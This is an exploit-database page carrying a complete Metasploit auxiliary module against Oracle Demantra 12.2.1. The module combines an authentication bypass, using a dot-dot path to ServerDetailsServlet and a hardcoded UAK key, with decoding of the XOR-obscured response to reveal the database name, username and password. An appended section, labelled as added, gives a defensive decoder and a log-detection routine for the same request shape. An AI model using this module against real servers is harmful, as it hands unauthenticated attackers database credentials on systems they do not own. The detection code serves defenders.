
Oracle Demantra Database Credentials Leak

2014-04-07 18:42:47
Oliver Gruskovnjak
www.rapid7.com

CVSS2: 5 (Medium)
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: NONE
Availability Impact: NONE
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

EPSS: 0.884 (High), percentile 98.7%

This module exploits a database credentials leak found in Oracle Demantra 12.2.1 in combination with an authentication bypass. This way an unauthenticated user can retrieve the database name, username and password on any vulnerable machine.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle Demantra Database Credentials Leak',
      'Description'    => %q{
        This module exploits a database credentials leak found in Oracle Demantra 12.2.1 in
        combination with an authentication bypass. This way an unauthenticated user can retrieve
        the database name, username and password on any vulnerable machine.
      },
      'References'     =>
        [
          [ 'CVE', '2013-5795'],
          [ 'CVE', '2013-5880'],
          [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5795/'],
          [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5880/' ]
        ],
      'Author'         =>
        [
          'Oliver Gruskovnjak'
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => '2014-02-28'
    ))

    register_options(
      [
        Opt::RPORT(8080),
        OptBool.new('SSL',   [false, 'Use SSL', false])
      ])
  end

  def run_host(ip)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri('demantra', 'common', 'loginCheck.jsp', '..', '..', 'ServerDetailsServlet'),
      'vars_get' => {
        'UAK' => '406EDC5447A3A43551CDBA06535FB6A661F4DC1E56606915AC4E382D204B8DC1'
      }
    })

    if res.nil? || res.body.empty?
      vprint_error("No content retrieved")
      return
    end

    if res.code == 404
      vprint_error("File not found")
      return
    end

    if res.code == 200
      creds = ""

      vprint_status("String received: #{res.body.to_s}") unless res.body.blank?

      # The servlet returns the credentials as comma-separated decimal byte
      # values, each XOR-ed with 0x50; undo the XOR to recover the plaintext.
      res.body.to_s.split(",").each do |c|
        i = c.to_i ^ 0x50
        creds += i.chr
      end
      print_good("Credentials decoded: #{creds}") unless creds.empty?
    end
  end
end
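Added example, not part of the module or the page: a stricter Ruby decoder for the servlet's XOR-encoded response (it rejects bodies that are not a run of byte values, so an HTML login page is not "decoded" into garbage) and a log check that flags requests shaped like this traversal. The sample log lines, the UAK value EXAMPLE, and the assumption that the module's traversal resolves to /demantra/ServerDetailsServlet are constructed for the example.

```ruby
require 'uri'

# Decode a ServerDetailsServlet response: comma-separated decimal byte values,
# each XOR-ed with 0x50 (the scheme the module above reverses). Returns nil
# unless the body has exactly that shape, so a 200 carrying a login page is
# not mistaken for a leaked credential string.
def decode_demantra_response(body)
  fields = body.to_s.split(',').map(&:strip)
  return nil if fields.empty? || fields.any? { |f| f !~ /\A\d+\z/ }
  vals = fields.map(&:to_i)
  return nil if vals.any? { |v| v > 0xFF }
  vals.map { |v| v ^ 0x50 }.pack('C*').force_encoding('UTF-8')
end

# Percent-decode a request target (query string dropped); keep the raw text if malformed.
def decode_path(raw)
  URI.decode_www_form_component(raw.split('?', 2).first) rescue raw
end

# Resolve '.' and '..' the way a servlet container would, so the module's
# /demantra/common/loginCheck.jsp/../../ServerDetailsServlet is judged by
# where it lands (assumed here: /demantra/ServerDetailsServlet), not by spelling.
def normalize_path(path)
  out = []
  path.split('/').each do |seg|
    next if seg.empty? || seg == '.'
    seg == '..' ? out.pop : out << seg
  end
  '/' + out.join('/')
end

SERVLET = '/demantra/ServerDetailsServlet'.freeze

# Select common-log-format lines whose request path uses dot-dot segments and
# resolves to ServerDetailsServlet: the auth-bypass shape this page describes.
def flag_demantra_bypass(log_lines)
  log_lines.select do |line|
    m = line.match(/"(?:GET|POST)\s+(\S+)\s+HTTP/)
    next false unless m
    path = decode_path(m[1])
    path.include?('/..') && normalize_path(path) == SERVLET
  end
end

# Constructed sample log lines (not taken from any real system).
SAMPLE_LOG = [
  '10.0.0.5 - - [07/Apr/2014:18:42:47 +0000] "GET /demantra/common/loginCheck.jsp HTTP/1.1" 200 512',
  '10.0.0.9 - - [07/Apr/2014:18:43:01 +0000] "GET /demantra/common/loginCheck.jsp/../../ServerDetailsServlet?UAK=EXAMPLE HTTP/1.1" 200 87',
  '10.0.0.9 - - [07/Apr/2014:18:43:09 +0000] "GET /demantra/common/loginCheck.jsp/..%2F..%2FServerDetailsServlet HTTP/1.1" 200 87'
].freeze
```

A direct request to /demantra/ServerDetailsServlet without dot-dot segments is not flagged, since it still meets the normal login check; the percent-encoded variant is caught because paths are decoded before normalization.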
